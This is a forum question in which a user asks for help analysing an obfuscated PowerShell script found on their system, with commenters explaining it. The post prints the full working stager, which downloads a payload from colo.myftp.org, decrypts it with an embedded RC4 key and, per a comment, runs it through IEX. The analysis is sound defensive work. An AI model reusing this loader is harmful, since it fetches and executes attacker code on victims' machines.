# phishing power shell script found

Tags: powershell

Some please help me to analyse this code.

```
[SYstem.NEt.SeRVICEPoiNtMAnagEr]::EXPecT100CONtinue=0;$wC=NEW-ObJECt SYsteM.NEt.WebCLiENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';

$wC.HEADerS.Add('User-Agent',$u);

$wC.PROxY=[SYstem.NEt.WeBReqUest]::DeFaULtWeBPrOxy;

$Wc.PRoXy.CRedEntiALS = [SYSTEM.NET.CReDENTiAlCaCHe]::DEFAULTNETwORkCREdENTIalS;

$Script:Proxy = $wc.Proxy;$K=[SYstem.TeXT.ENcodiNg]::ASCII.GetBYTEs('3c9825ffc1d70f40ec648606c637200d'); $R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COunt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]}; $D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxOr$S[($S[$I]+$S[$H])%256]}}; $ser='http://colo.myftp.org:4445';$t='/admin/get.php';$wC.HEadeRs.ADD("Cookie","session=R9rR6fhOaMdGNJI1saLgl2JtVSY="); $daTA=$WC.DOWnlOADDATa($SER+$T); $IV=$DATa[0..3];$DaTA=$dATa[4..$dATa.lENGTH];
-JOiN[ChAR[]](& $R $dAta ($IV+$K)) write-host $R
```

someone tries to access my system,i just extracted some code blocks from there application. Please help me to analyse this code.

Comment: It's downloading a payload from a remote server and then concatenating it with content stored in/generated by this script. Then it writes it to the console (but in doing so, may actually do something more nefarious). If you replace `write-host` with a function that writes the content to a file, then open in a safe text editor, you may gain more insight. But I wouldn't do this on anything but a disposable, sandboxed system.

Comment: Write-host i just added to check the variable content. Actual code look like this -JOiN[ChAR[]](& $R $dAta ($IV+$K))|IEX

Comment: `IEX` is the default alias for `Invoke-Expression` - IOW, it's downloading a payload (script) and executing it on your system. So the real question is, what is in that script?

Comment: Smells  something Phishy?

Comment: This obfuscation is just funny, honestly.